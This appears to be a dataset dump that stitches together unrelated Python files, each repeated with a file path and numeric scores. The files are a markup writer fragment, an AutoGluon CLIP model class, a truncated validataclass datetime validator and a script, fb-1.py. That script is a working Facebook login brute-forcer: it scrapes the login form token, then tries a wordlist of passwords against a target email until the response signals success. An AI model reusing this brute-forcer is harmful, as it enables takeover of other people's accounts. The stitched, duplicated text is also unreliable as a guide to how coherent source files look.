def content(self, content=None, escape=True, newline=False):
if content:
self._write(self._escape(content) if escape else content, newline)
def _escape(self, content):
raise NotImplementedError
def end(self, name, newline=True):
self._write('</%s>' % name, newline)
def element(self, name, content=None, attrs=None, escape=True,
newline=True, replace_newlines=False):
attrs = self._format_attrs(attrs)
if self._write_empty or content or attrs:
self._start(name, attrs, newline=False)
self.content(content, escape, replace_newlines)
self.end(name, newline)
def close(self):
"""Closes the underlying output file."""
self.output.close()
def _write(self, text, newline=False):
self.output.write(text)
if newline:
self.output.write('\n')
class HtmlWriter(_MarkupWriter):
def _order_attrs(self, attrs):
return sorted(attrs) # eases testing
def _escape(self, content):
return html_escape(content)
class XmlWriter(_MarkupWriter):
def _preamble(self):
self._write('<?xml version="1.0" encoding="UTF-8"?>', newline=True)
def _escape(self, text):
return xml_escape(text)
class NullMarkupWriter(object):
"""Null implementation of _MarkupWriter interface."""
__init__ = start = content = element = end = close = lambda *args: None | 0.757077 | 0.142024 |
import torch
import logging
from torch import nn
from transformers import CLIPModel
from .utils import assign_layer_ids
from ..constants import (
IMAGE, IMAGE_VALID_NUM, TEXT_TOKEN_IDS,
TEXT_VALID_LENGTH, LABEL, LOGITS, FEATURES, AUTOMM
)
from typing import Optional
from .utils import init_weights
logger = logging.getLogger(AUTOMM)
class CLIPForImageText(nn.Module):
"""
Support the CLIP model.
Refer to https://huggingface.co/docs/transformers/model_doc/clip
"""
def __init__(
self,
prefix: str,
checkpoint_name: str,
num_classes: Optional[int] = 0,
):
"""
Load the pretrained CLIP from huggingface transformers.
Parameters
----------
prefix
The model prefix.
checkpoint_name
Name of the checkpoint.
num_classes
The number of classes. 1 for a regression task.
"""
logger.debug(f"initializing {prefix}")
super().__init__()
self.model = CLIPModel.from_pretrained(checkpoint_name)
self.out_features = self.model.config.projection_dim
self.head = nn.Linear(self.out_features, num_classes) if num_classes > 0 else nn.Identity()
self.head.apply(init_weights)
self.text_token_ids_key = f"{prefix}_{TEXT_TOKEN_IDS}"
self.text_valid_length_key = f"{prefix}_{TEXT_VALID_LENGTH}"
self.image_key = f"{prefix}_{IMAGE}"
self.image_valid_num_key = f"{prefix}_{IMAGE_VALID_NUM}"
self.label_key = f"{prefix}_{LABEL}"
self.name_to_id = self.get_layer_ids()
self.head_layer_names = [n for n, layer_id in self.name_to_id.items() if layer_id == 0]
def forward(
self,
batch: dict,
):
"""
Parameters
----------
batch
A dictionary containing the input mini-batch data.
We need to use the keys with the model prefix to index required data.
Returns
-------
A dictionary with logits and features.
"""
text_token_ids = batch[self.text_token_ids_key]
text_valid_length = batch[self.text_valid_length_key]
images = batch[self.image_key]
image_valid_num = batch[self.image_valid_num_key]
steps = torch.arange(0, text_token_ids.shape[1]).type_as(text_valid_length)
text_masks = (steps.reshape((1, -1)) < text_valid_length.reshape((-1, 1))).type_as(text_token_ids)
assert torch.equal(text_valid_length, text_masks.sum(dim=-1))
assert images.dim() == 5
b, n, c, h, w = images.shape
image_features = self.model.get_image_features(
pixel_values=images.reshape((b * n, c, h, w)),
)
steps = torch.arange(0, n).type_as(image_valid_num)
image_masks = (steps.reshape((1, -1)) < image_valid_num.reshape((-1, 1))).type_as(image_features) # (b, n)
image_features = image_features.reshape((b, n, -1)) * image_masks[:, :, None] # (b, n, num_features)
image_features = image_features.sum(dim=1) # (b, num_features)
text_features = self.model.get_text_features(
input_ids=text_token_ids,
attention_mask=text_masks,
)
# Here we add up the text and image embeddings
features = image_features + text_features
logits = self.head(features)
return {
LOGITS: logits,
FEATURES: features,
}
def get_layer_ids(self,):
"""
Assign an id to each layer. Layer ids will be used in layer-wise lr decay.
Basically, id gradually increases when going from the output end to
the input end. The layers defined in this class, e.g., head, have id 0.
Returns
-------
A dictionary mapping the layer names (keys) to their ids (values).
"""
model_prefixes = ["model.text_model", "model.vision_model", "model"]
# later model prefixes can't starts with the early ones
for i, model_pre in enumerate(model_prefixes):
for model_pre2 in model_prefixes[i+1:]:
if model_pre2.startswith(model_pre):
raise ValueError(
f"{model_pre} is a substring of {model_pre2}. "
f"Need to swap them in {model_prefixes}."
)
pre_encoder_patterns = ("embeddings", "pre")
post_encoder_patterns = ("head", "final", "post", "logit", "project")
names = [n for n, _ in self.named_parameters()]
name_to_id = {}
for per_prefix in model_prefixes:
per_model_name_to_id, names = assign_layer_ids(
names=names,
pre_encoder_patterns=pre_encoder_patterns,
post_encoder_patterns=post_encoder_patterns,
model_pre=per_prefix,
)
name_to_id.update(per_model_name_to_id)
if len(names) > 0:
logger.debug(f"outer layers are treated as head: {names}")
for n in names:
assert n not in name_to_id
name_to_id[n] = 0
return name_to_id | text/src/autogluon/text/automm/models/clip.py | import torch
import logging
from torch import nn
from transformers import CLIPModel
from .utils import assign_layer_ids
from ..constants import (
IMAGE, IMAGE_VALID_NUM, TEXT_TOKEN_IDS,
TEXT_VALID_LENGTH, LABEL, LOGITS, FEATURES, AUTOMM
)
from typing import Optional
from .utils import init_weights
logger = logging.getLogger(AUTOMM)
class CLIPForImageText(nn.Module):
"""
Support the CLIP model.
Refer to https://huggingface.co/docs/transformers/model_doc/clip
"""
def __init__(
self,
prefix: str,
checkpoint_name: str,
num_classes: Optional[int] = 0,
):
"""
Load the pretrained CLIP from huggingface transformers.
Parameters
----------
prefix
The model prefix.
checkpoint_name
Name of the checkpoint.
num_classes
The number of classes. 1 for a regression task.
"""
logger.debug(f"initializing {prefix}")
super().__init__()
self.model = CLIPModel.from_pretrained(checkpoint_name)
self.out_features = self.model.config.projection_dim
self.head = nn.Linear(self.out_features, num_classes) if num_classes > 0 else nn.Identity()
self.head.apply(init_weights)
self.text_token_ids_key = f"{prefix}_{TEXT_TOKEN_IDS}"
self.text_valid_length_key = f"{prefix}_{TEXT_VALID_LENGTH}"
self.image_key = f"{prefix}_{IMAGE}"
self.image_valid_num_key = f"{prefix}_{IMAGE_VALID_NUM}"
self.label_key = f"{prefix}_{LABEL}"
self.name_to_id = self.get_layer_ids()
self.head_layer_names = [n for n, layer_id in self.name_to_id.items() if layer_id == 0]
def forward(
self,
batch: dict,
):
"""
Parameters
----------
batch
A dictionary containing the input mini-batch data.
We need to use the keys with the model prefix to index required data.
Returns
-------
A dictionary with logits and features.
"""
text_token_ids = batch[self.text_token_ids_key]
text_valid_length = batch[self.text_valid_length_key]
images = batch[self.image_key]
image_valid_num = batch[self.image_valid_num_key]
steps = torch.arange(0, text_token_ids.shape[1]).type_as(text_valid_length)
text_masks = (steps.reshape((1, -1)) < text_valid_length.reshape((-1, 1))).type_as(text_token_ids)
assert torch.equal(text_valid_length, text_masks.sum(dim=-1))
assert images.dim() == 5
b, n, c, h, w = images.shape
image_features = self.model.get_image_features(
pixel_values=images.reshape((b * n, c, h, w)),
)
steps = torch.arange(0, n).type_as(image_valid_num)
image_masks = (steps.reshape((1, -1)) < image_valid_num.reshape((-1, 1))).type_as(image_features) # (b, n)
image_features = image_features.reshape((b, n, -1)) * image_masks[:, :, None] # (b, n, num_features)
image_features = image_features.sum(dim=1) # (b, num_features)
text_features = self.model.get_text_features(
input_ids=text_token_ids,
attention_mask=text_masks,
)
# Here we add up the text and image embeddings
features = image_features + text_features
logits = self.head(features)
return {
LOGITS: logits,
FEATURES: features,
}
def get_layer_ids(self,):
"""
Assign an id to each layer. Layer ids will be used in layer-wise lr decay.
Basically, id gradually increases when going from the output end to
the input end. The layers defined in this class, e.g., head, have id 0.
Returns
-------
A dictionary mapping the layer names (keys) to their ids (values).
"""
model_prefixes = ["model.text_model", "model.vision_model", "model"]
# later model prefixes can't starts with the early ones
for i, model_pre in enumerate(model_prefixes):
for model_pre2 in model_prefixes[i+1:]:
if model_pre2.startswith(model_pre):
raise ValueError(
f"{model_pre} is a substring of {model_pre2}. "
f"Need to swap them in {model_prefixes}."
)
pre_encoder_patterns = ("embeddings", "pre")
post_encoder_patterns = ("head", "final", "post", "logit", "project")
names = [n for n, _ in self.named_parameters()]
name_to_id = {}
for per_prefix in model_prefixes:
per_model_name_to_id, names = assign_layer_ids(
names=names,
pre_encoder_patterns=pre_encoder_patterns,
post_encoder_patterns=post_encoder_patterns,
model_pre=per_prefix,
)
name_to_id.update(per_model_name_to_id)
if len(names) > 0:
logger.debug(f"outer layers are treated as head: {names}")
for n in names:
assert n not in name_to_id
name_to_id[n] = 0
return name_to_id | 0.922308 | 0.423756 |
import os.path
import requests
from bs4 import BeautifulSoup
import sys
if sys.version_info[0] != 3:
print('''\t--------------------------------------\n\t\tREQUIRED PYTHON 3.x\n\t\tinstall and try: python3
fb.py\n\t--------------------------------------''')
sys.exit()
PASSWORD_FILE = "<PASSWORD>.<PASSWORD>"
MIN_PASSWORD_LENGTH = 6
POST_URL = 'https://www.facebook.com/login.php'
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
}
PAYLOAD = {}
COOKIES = {}
def create_form():
form = dict()
cookies = {'fr': '0ZvhC3YwYm63ZZat1..Ba0Ipu.Io.AAA.0.0.Ba0Ipu.AWUPqDLy'}
data = requests.get(POST_URL, headers=HEADERS)
for i in data.cookies:
cookies[i.name] = i.value
data = BeautifulSoup(data.text, 'html.parser').form
if data.input['name'] == 'lsd':
form['lsd'] = data.input['value']
return form, cookies
def is_this_a_password(email, index, password):
global PAYLOAD, COOKIES
if index % 10 == 0:
PAYLOAD, COOKIES = create_form()
PAYLOAD['email'] = email
PAYLOAD['pass'] = password
r = requests.post(POST_URL, data=PAYLOAD, cookies=COOKIES, headers=HEADERS)
if 'Find Friends' in r.text or 'security code' in r.text or 'Two-factor authentication' in r.text or "Log Out" in r.text:
open('temp', 'w').write(str(r.content))
print('\nPassword found is: ', password)
return True
return False
if __name__ == "__main__":
print('\n---------- Welcome To DateForce ----------\n')
if not os.path.isfile(PASSWORD_FILE):
print("Password file is not exist: ", PASSWORD_FILE)
sys.exit(0)
password_data = open(PASSWORD_FILE, 'r').read().split("\n")
print("Password file selected: ", PASSWORD_FILE)
email = input('Enter Email/Username to target: ').strip()
for index, password in zip(range(password_data.__len__()), password_data):
password = <PASSWORD>()
if len(password) < MIN_PASSWORD_LENGTH:
continue
print("Trying password [", index, "]: ", password)
if is_this_a_password(email, index, password):
break | fb-1.py | import os.path
import requests
from bs4 import BeautifulSoup
import sys
if sys.version_info[0] != 3:
print('''\t--------------------------------------\n\t\tREQUIRED PYTHON 3.x\n\t\tinstall and try: python3
fb.py\n\t--------------------------------------''')
sys.exit()
PASSWORD_FILE = "<PASSWORD>.<PASSWORD>"
MIN_PASSWORD_LENGTH = 6
POST_URL = 'https://www.facebook.com/login.php'
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
}
PAYLOAD = {}
COOKIES = {}
def create_form():
form = dict()
cookies = {'fr': '0ZvhC3YwYm63ZZat1..Ba0Ipu.Io.AAA.0.0.Ba0Ipu.AWUPqDLy'}
data = requests.get(POST_URL, headers=HEADERS)
for i in data.cookies:
cookies[i.name] = i.value
data = BeautifulSoup(data.text, 'html.parser').form
if data.input['name'] == 'lsd':
form['lsd'] = data.input['value']
return form, cookies
def is_this_a_password(email, index, password):
global PAYLOAD, COOKIES
if index % 10 == 0:
PAYLOAD, COOKIES = create_form()
PAYLOAD['email'] = email
PAYLOAD['pass'] = password
r = requests.post(POST_URL, data=PAYLOAD, cookies=COOKIES, headers=HEADERS)
if 'Find Friends' in r.text or 'security code' in r.text or 'Two-factor authentication' in r.text or "Log Out" in r.text:
open('temp', 'w').write(str(r.content))
print('\nPassword found is: ', password)
return True
return False
if __name__ == "__main__":
print('\n---------- Welcome To DateForce ----------\n')
if not os.path.isfile(PASSWORD_FILE):
print("Password file is not exist: ", PASSWORD_FILE)
sys.exit(0)
password_data = open(PASSWORD_FILE, 'r').read().split("\n")
print("Password file selected: ", PASSWORD_FILE)
email = input('Enter Email/Username to target: ').strip()
for index, password in zip(range(password_data.__len__()), password_data):
password = <PASSWORD>()
if len(password) < MIN_PASSWORD_LENGTH:
continue
print("Trying password [", index, "]: ", password)
if is_this_a_password(email, index, password):
break | 0.087815 | 0.071494 |
from datetime import datetime, tzinfo
from enum import Enum
import re
from typing import Any, Optional
from .string_validator import StringValidator
from validataclass.exceptions import InvalidDateTimeError, InvalidValidatorOptionException, DateTimeRangeError
from validataclass.helpers.datetime_range import BaseDateTimeRange
__all__ = [
'DateTimeFormat',
'DateTimeValidator',
]
# Helper variables to construct more complex regex patterns
_REGEX_DATE = r'(\d{4}-\d{2}-\d{2})'
_REGEX_TIME = r'(\d{2}:\d{2}:\d{2}(\.\d{3}(\d{3})?)?)'
_REGEX_TIMEZONE = r'(Z|[+-]\d{2}:\d{2})'
_REGEX_UTC_ONLY = r'(Z|[+-]00:00)'
_REGEX_DATE_AND_TIME = f'{_REGEX_DATE}T{_REGEX_TIME}'
class DateTimeFormat(Enum):
"""
Enum to specify allowed datetime format (e.g. with/without timezone info).
Enum members have two properties:
- format_str: String representation used in InvalidDateTimeError (e.g. "<DATE>T<TIME>[<TIMEZONE>]")
- regex_str: Regular expression pattern as string
"""
def __init__(self, format_str, regex_str):
self.format_str = format_str
self.regex_str = regex_str
def allows_local(self) -> bool:
""" Returns True if the format allows local datetimes (i.e. datetime strings without timezone info). """
return True if self in [self.ALLOW_TIMEZONE, self.LOCAL_ONLY, self.LOCAL_OR_UTC] else False
# Allows datetimes both with and without timezone info, the latter being interpreted as local time (default)
ALLOW_TIMEZONE = ('<DATE>T<TIME>[<TIMEZONE>]', f'{_REGEX_DATE_AND_TIME}{_REGEX_TIMEZONE}?')
# Only allows datetimes with timezone info ('Z' suffix for UTC or any '[+-]HH:MM...' timezone)
REQUIRE_TIMEZONE = ('<DATE>T<TIME><TIMEZONE>', f'{_REGEX_DATE_AND_TIME}{_REGEX_TIMEZONE}')
# Only allows datetimes in UTC with explicit timezone info ('Z' or '+00:00' suffix)
REQUIRE_UTC = ('<DATE>T<TIME>Z', f'{_REGEX_DATE_AND_TIME}{_REGEX_UTC_ONLY}')
# Only allows datetimes without timezone info (will be interpreted as local time)
LOCAL_ONLY = ('<DATE>T<TIME>', f'{_REGEX_DATE_AND_TIME}')
# Allows datetimes without timezone info (as local time) and datetimes in UTC ('Z' or '+00:00'), but no other timezones
LOCAL_OR_UTC = ('<DATE>T<TIME>[Z]', f'{_REGEX_DATE_AND_TIME}{_REGEX_UTC_ONLY}?')
class DateTimeValidator(StringValidator):
"""
Validator that parses datetime strings in the ISO 8601 compatible format "YYYY-MM-DDTHH:MM:SS[.fff[fff][+HH:MM]" to `datetime.datetime`
objects, where "T" stands for the literal character as a separator between date and time (e.g. "2021-12-31T12:34:56" or
"2021-12-31T12:34:56.123456").
The string may specify a timezone using "+HH:MM" or "-HH:MM". Also the special suffix "Z" is allowed to denote UTC as the timezone
(e.g. "2021-12-31T12:34:56Z" which is equivalent to "2021-12-31T12:34:56+00:00"). If no timezone is specified, the datetime is
interpreted as local time (see also the parameter 'local_timezone').
By default the validator allows datetimes with and without timezones. To restrict this to specific formats you can use the
`DateTimeFormat` enum, which has the following values:
- ALLOW_TIMEZONE: Default behavior, allows datetimes with any timezone or without a timezone (local time)
- REQUIRE_TIMEZONE: Only allows datetimes that specify a timezone (but any timezone is allowed)
- REQUIRE_UTC: Only allows datetimes that explicitly specify UTC as timezone (either with "Z" or "+00:00")
- LOCAL_ONLY: Only allows datetimes WITHOUT timezone (will be interpreted as local time)
- LOCAL_OR_UTC: Only allows local datetimes (no timezone) or UTC datetimes (explicitly specified with "Z" or "+00:00")
```
Example input | ALLOW_TIMEZONE | REQUIRE_TIMEZONE | REQUIRE_UTC | LOCAL_ONLY | LOCAL_OR_UTC
--------------------------|----------------|------------------|-------------|------------|-------------
2021-12-31T12:34:56 | valid | | | valid | valid
2021-12-31T12:34:56Z | valid | valid | valid | | valid
2021-12-31T12:34:56+00:00 | valid | valid | valid | | valid
2021-12-31T12:34:56+02:00 | valid | valid | | |
```
The parameter 'local_timezone' can be used to set the timezone for datetime strings that don't specify a timezone. For example, if
'local_timezone' is set to a UTC+3 timezone, the string "2021-12-31T12:34:56" will be treated like "2021-12-31T12:34:56+03:00".
Similarly, to interpret datetimes without timezone as UTC, set `local_timezone=datetime.timezone.utc`. If 'local_timezone' is not
set (which is the default), the resulting datetime will have no timezone info (`tzinfo=None`).
The parameter 'target_timezone' can be used to convert all resulting datetime objects to a uniform timezone. This requires the
datetimes to already have a timezone, so to allow local datetimes (without timezone info in the input string) you need to specify
'local_timezone' as well.
See `datetime.timezone` and `dateutil.tz` (https://dateutil.readthedocs.io/en/stable/tz.html) for information on defining timezones.
Additionally the parameter 'datetime_range' can be used to specify a range of datetime values that are allowed (e.g. a minimum and
a maximum datetime, which can be dynamically defined using callables). See the classes `DateTimeRange` and `DateTimeOffsetRange`
from `validataclass.helpers.datetime_range` for further information.
Note: When using datetime ranges, make sure not to mix datetimes that have timezones with local datetimes because those comparisons
will raise `TypeError` exceptions. It's recommended either to use only datetimes with defined timezones (for both input values and
the boundaries of the datetime ranges), or to specify the 'local_timezone' parameter (which will also be used to determine the
timezone of the range boundary datetimes if they do not specify timezones themselves).
Examples:
```
# Use `dateutil.tz` to easily specify timezones apart from UTC
from dateutil import tz
# Validate datetimes with and without timezone
# "2021-12-31T12:34:56" -> datetime(2021, 12, 31, 12, 34, 56)
# "2021-12-31T12:34:56+02:00" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone(timedelta(hours=2)))
DateTimeValidator()
# Only allow datetimes with specified timezone
# "2021-12-31T12:34:56+02:00" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone(timedelta(hours=2)))
DateTimeValidator(DateTimeFormat.REQUIRE_TIMEZONE)
# Only allow datetimes either without timezone (local time) or with UTC explicitly specified ('Z' or '+00:00' suffix)
# "2021-12-31T12:34:56" -> datetime(2021, 12, 31, 12, 34, 56)
# "2021-12-31T12:34:56Z" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone.utc)
DateTimeValidator(DateTimeFormat.LOCAL_OR_UTC)
# As above (local time or UTC), but set a local_timezone as the default value for the datetime's tzinfo
# "2021-12-31T12:34:56" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=tz.gettz('Europe/Berlin'))
# "2021-12-31T12:34:56Z" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone.utc)
DateTimeValidator(DateTimeFormat.LOCAL_OR_UTC, local_timezone=tz.gettz('Europe/Berlin'))
# Allow datetime strings with and without timezone (using CET/CEST (+01:00/+02:00) as default), but convert all datetimes to UTC
# "2021-12-31T12:34:56" -> datetime(2021, 12, 31, 11, 34, 56, tzinfo=timezone.utc) (input interpreted as UTC+01:00)
# "2021-12-31T12:34:56Z" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone.utc) (unchanged because it's already UTC)
# "2021-12-31T12:34:56-06:00" -> datetime(2021, 12, 31, 18, 34, 56, tzinfo=timezone.utc)
DateTimeValidator(local_timezone=tz.gettz('Europe/Berlin'), target_timezone=timezone.utc)
```
Examples for datetime ranges:
```
from validataclass.helpers import DateTimeRange, DateTimeOffsetRange
# Only allow datetimes within a specified datetime range, e.g. allow all datetimes in the year 2021
DateTimeValidator(local_timezone=timezone.utc, datetime_range=DateTimeRange(
datetime(2021, 1, 1, 0, 0, 0, tzinfo=timezone.utc),
datetime(2021, 12, 31, 23, 59, 59, 999999, tzinfo=timezone.utc)
))
# Specify a datetime range using a pivot datetime and two offsets (allows all datetimes "around" some datetime plus/minus offsets),
# e.g. all datetimes between pivot_datetime - 5 minutes and pivot_datetime + 10 minutes:
DateTimeValidator(local_timezone=timezone.utc, datetime_range=DateTimeOffsetRange(
pivot=datetime(2021, 5, 25, 12, 0, 0, tzinfo=timezone.utc),
offset_minus=timedelta(minutes=5),
offset_plus=timedelta(minutes=10)
))
# The pivot can also be a callable (which will be evaluated just when the validator is called), or undefined, in which case it
# defaults to the current time (in UTC and without milliseconds), e.g. to only allow all datetimes in the next 2 weeks:
DateTimeValidator(local_timezone=timezone.utc, datetime_range=DateTimeOffsetRange(offset_plus=timedelta(weeks=2)))
```
See also: `DateValidator`, `TimeValidator`
Valid input: Datetime strings in the format specified above as `str`
Output: `datetime.datetime`
"""
# Datetime string format (enum)
datetime_format: DateTimeFormat
# Precompiled regular expression for the specified datetime string format
datetime_format_regex: re.Pattern
# Timezone to use for datetime strings without a specified timezone (None: no default timezone info in datetime)
local_timezone: Optional[tzinfo] = None
# Target timezone that all datetimes will be converted to (None: no timezone conversion)
target_timezone: Optional[tzinfo] = None
# Datetime range that defines which values are allowed
datetime_range: Optional[BaseDateTimeRange] = None
def __init__(
self,
datetime_format: DateTimeFormat = DateTimeFormat.ALLOW_TIMEZONE,
*,
local_timezone: Optional[tzinfo] = None,
target_timezone: Optional[tzinfo] = None,
datetime_range: Optional[BaseDateTimeRange] = None,
):
"""
Create a `DateTimeValidator` with a specified datetime string format, optionally a local timezone, a target timezone and/or
a datetime range.
If a target timezone is specified and a format that allows local datetimes is used (ALLOW_TIMEZONE, LOCAL_ONLY or LOCAL_OR_UTC),
the parameter "local_timezone" is required (otherwise it would be unclear how to interpret and convert local datetimes).
To define datetime ranges using the "datetime_range" parameter, see the classes `DateTimeRange` and `DateTimeOffsetRange` from
`validataclass.helpers.datetime_range`.
Parameters:
datetime_format: `DateTimeFormat`, specifies the accepted string formats (default: `ALLOW_TIMEZONE`)
local_timezone: `tzinfo`, specifies the default timezone to set for datetime strings without timezone info (default: None)
target_timezone: `tzinfo`, if specified, all datetimes will be converted to this timezone (default: None)
datetime_range: `BaseDateTimeRange` (subclasses), specifies the range of allowed values (default: None)
"""
# Initialize StringValidator without any parameters
super().__init__()
# Check parameter validity
if target_timezone is not None and datetime_format.allows_local() and local_timezone is None:
raise InvalidValidatorOptionException('Parameter "local_timezone" is required when a datetime format that allows local '
'datetimes is used and "target_timezone" is specified.')
# Save parameters
self.datetime_format = datetime_format
self.local_timezone = local_timezone
self.target_timezone = target_timezone
self.datetime_range = datetime_range
# Precompile regular expression for datetime format
self.datetime_format_regex = re.compile(self.datetime_format.regex_str)
def validate(self, input_data: Any) -> datetime:
"""
Validate input as a valid datetime string and convert it to a `datetime.datetime` object.
"""
# First, validate input data as string
datetime_string = super().validate(input_data)
# Validate string format with a regular expression
if not self.datetime_format_regex.fullmatch(datetime_string):
raise InvalidDateTimeError(datetime_format_str=self.datetime_format.format_str)
# Replace 'Z' suffix to make the string compatible with fromisoformat()
if datetime_string[-1] == 'Z':
datetime_string = datetime_string[:-1] + '+00:00'
# Try to create datetime object from string (accepts a certain subset of ISO 8601 datetime strings)
try:
datetime_obj = datetime.fromisoformat(datetime_string)
except ValueError:
raise InvalidDateTimeError(datetime_format_str=self.datetime_format.format_str)
# Set timezone to local_timezone if no timezone is specified
if datetime_obj.tzinfo is None and self.local_timezone is not None:
datetime_obj = datetime_obj.replace(tzinfo=self.local_timezone)
# Check datetime against datetime_range (if defined)
if self.datetime_range is not None and not self.datetime_range.contains_datetime(datetime_obj, self.local_timezone):
# Add extra fields (lower_boundary, upper_boundary) to the validation error
raise DateTimeRangeError(**self.datetime_range.to_dict(self.local_timezone))
# Convert datetime to target timezone (if defined)
if self.target_timezone is not None:
datetime_obj = datetime_obj.astimezone(self.target_timezone)
return datetime_obj | src/validataclass/validators/datetime_validator.py | from datetime import datetime, tzinfo
from enum import Enum
import re
from typing import Any, Optional
from .string_validator import StringValidator
from validataclass.exceptions import InvalidDateTimeError, InvalidValidatorOptionException, DateTimeRangeError
from validataclass.helpers.datetime_range import BaseDateTimeRange
__all__ = [
'DateTimeFormat',
'DateTimeValidator',
]
# Helper variables to construct more complex regex patterns
_REGEX_DATE = r'(\d{4}-\d{2}-\d{2})'
_REGEX_TIME = r'(\d{2}:\d{2}:\d{2}(\.\d{3}(\d{3})?)?)'
_REGEX_TIMEZONE = r'(Z|[+-]\d{2}:\d{2})'
_REGEX_UTC_ONLY = r'(Z|[+-]00:00)'
_REGEX_DATE_AND_TIME = f'{_REGEX_DATE}T{_REGEX_TIME}'
class DateTimeFormat(Enum):
"""
Enum to specify allowed datetime format (e.g. with/without timezone info).
Enum members have two properties:
- format_str: String representation used in InvalidDateTimeError (e.g. "<DATE>T<TIME>[<TIMEZONE>]")
- regex_str: Regular expression pattern as string
"""
def __init__(self, format_str, regex_str):
self.format_str = format_str
self.regex_str = regex_str
def allows_local(self) -> bool:
""" Returns True if the format allows local datetimes (i.e. datetime strings without timezone info). """
return True if self in [self.ALLOW_TIMEZONE, self.LOCAL_ONLY, self.LOCAL_OR_UTC] else False
# Allows datetimes both with and without timezone info, the latter being interpreted as local time (default)
ALLOW_TIMEZONE = ('<DATE>T<TIME>[<TIMEZONE>]', f'{_REGEX_DATE_AND_TIME}{_REGEX_TIMEZONE}?')
# Only allows datetimes with timezone info ('Z' suffix for UTC or any '[+-]HH:MM...' timezone)
REQUIRE_TIMEZONE = ('<DATE>T<TIME><TIMEZONE>', f'{_REGEX_DATE_AND_TIME}{_REGEX_TIMEZONE}')
# Only allows datetimes in UTC with explicit timezone info ('Z' or '+00:00' suffix)
REQUIRE_UTC = ('<DATE>T<TIME>Z', f'{_REGEX_DATE_AND_TIME}{_REGEX_UTC_ONLY}')
# Only allows datetimes without timezone info (will be interpreted as local time)
LOCAL_ONLY = ('<DATE>T<TIME>', f'{_REGEX_DATE_AND_TIME}')
# Allows datetimes without timezone info (as local time) and datetimes in UTC ('Z' or '+00:00'), but no other timezones
LOCAL_OR_UTC = ('<DATE>T<TIME>[Z]', f'{_REGEX_DATE_AND_TIME}{_REGEX_UTC_ONLY}?')
class DateTimeValidator(StringValidator):
"""
Validator that parses datetime strings in the ISO 8601 compatible format "YYYY-MM-DDTHH:MM:SS[.fff[fff][+HH:MM]" to `datetime.datetime`
objects, where "T" stands for the literal character as a separator between date and time (e.g. "2021-12-31T12:34:56" or
"2021-12-31T12:34:56.123456").
The string may specify a timezone using "+HH:MM" or "-HH:MM". Also the special suffix "Z" is allowed to denote UTC as the timezone
(e.g. "2021-12-31T12:34:56Z" which is equivalent to "2021-12-31T12:34:56+00:00"). If no timezone is specified, the datetime is
interpreted as local time (see also the parameter 'local_timezone').
By default the validator allows datetimes with and without timezones. To restrict this to specific formats you can use the
`DateTimeFormat` enum, which has the following values:
- ALLOW_TIMEZONE: Default behavior, allows datetimes with any timezone or without a timezone (local time)
- REQUIRE_TIMEZONE: Only allows datetimes that specify a timezone (but any timezone is allowed)
- REQUIRE_UTC: Only allows datetimes that explicitly specify UTC as timezone (either with "Z" or "+00:00")
- LOCAL_ONLY: Only allows datetimes WITHOUT timezone (will be interpreted as local time)
- LOCAL_OR_UTC: Only allows local datetimes (no timezone) or UTC datetimes (explicitly specified with "Z" or "+00:00")
```
Example input | ALLOW_TIMEZONE | REQUIRE_TIMEZONE | REQUIRE_UTC | LOCAL_ONLY | LOCAL_OR_UTC
--------------------------|----------------|------------------|-------------|------------|-------------
2021-12-31T12:34:56 | valid | | | valid | valid
2021-12-31T12:34:56Z | valid | valid | valid | | valid
2021-12-31T12:34:56+00:00 | valid | valid | valid | | valid
2021-12-31T12:34:56+02:00 | valid | valid | | |
```
The parameter 'local_timezone' can be used to set the timezone for datetime strings that don't specify a timezone. For example, if
'local_timezone' is set to a UTC+3 timezone, the string "2021-12-31T12:34:56" will be treated like "2021-12-31T12:34:56+03:00".
Similarly, to interpret datetimes without timezone as UTC, set `local_timezone=datetime.timezone.utc`. If 'local_timezone' is not
set (which is the default), the resulting datetime will have no timezone info (`tzinfo=None`).
The parameter 'target_timezone' can be used to convert all resulting datetime objects to a uniform timezone. This requires the
datetimes to already have a timezone, so to allow local datetimes (without timezone info in the input string) you need to specify
'local_timezone' as well.
See `datetime.timezone` and `dateutil.tz` (https://dateutil.readthedocs.io/en/stable/tz.html) for information on defining timezones.
Additionally the parameter 'datetime_range' can be used to specify a range of datetime values that are allowed (e.g. a minimum and
a maximum datetime, which can be dynamically defined using callables). See the classes `DateTimeRange` and `DateTimeOffsetRange`
from `validataclass.helpers.datetime_range` for further information.
Note: When using datetime ranges, make sure not to mix datetimes that have timezones with local datetimes because those comparisons
will raise `TypeError` exceptions. It's recommended either to use only datetimes with defined timezones (for both input values and
the boundaries of the datetime ranges), or to specify the 'local_timezone' parameter (which will also be used to determine the
timezone of the range boundary datetimes if they do not specify timezones themselves).
Examples:
```
# Use `dateutil.tz` to easily specify timezones apart from UTC
from dateutil import tz
# Validate datetimes with and without timezone
# "2021-12-31T12:34:56" -> datetime(2021, 12, 31, 12, 34, 56)
# "2021-12-31T12:34:56+02:00" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone(timedelta(hours=2)))
DateTimeValidator()
# Only allow datetimes with specified timezone
# "2021-12-31T12:34:56+02:00" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone(timedelta(hours=2)))
DateTimeValidator(DateTimeFormat.REQUIRE_TIMEZONE)
# Only allow datetimes either without timezone (local time) or with UTC explicitly specified ('Z' or '+00:00' suffix)
# "2021-12-31T12:34:56" -> datetime(2021, 12, 31, 12, 34, 56)
# "2021-12-31T12:34:56Z" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone.utc)
DateTimeValidator(DateTimeFormat.LOCAL_OR_UTC)
# As above (local time or UTC), but set a local_timezone as the default value for the datetime's tzinfo
# "2021-12-31T12:34:56" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=tz.gettz('Europe/Berlin'))
# "2021-12-31T12:34:56Z" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone.utc)
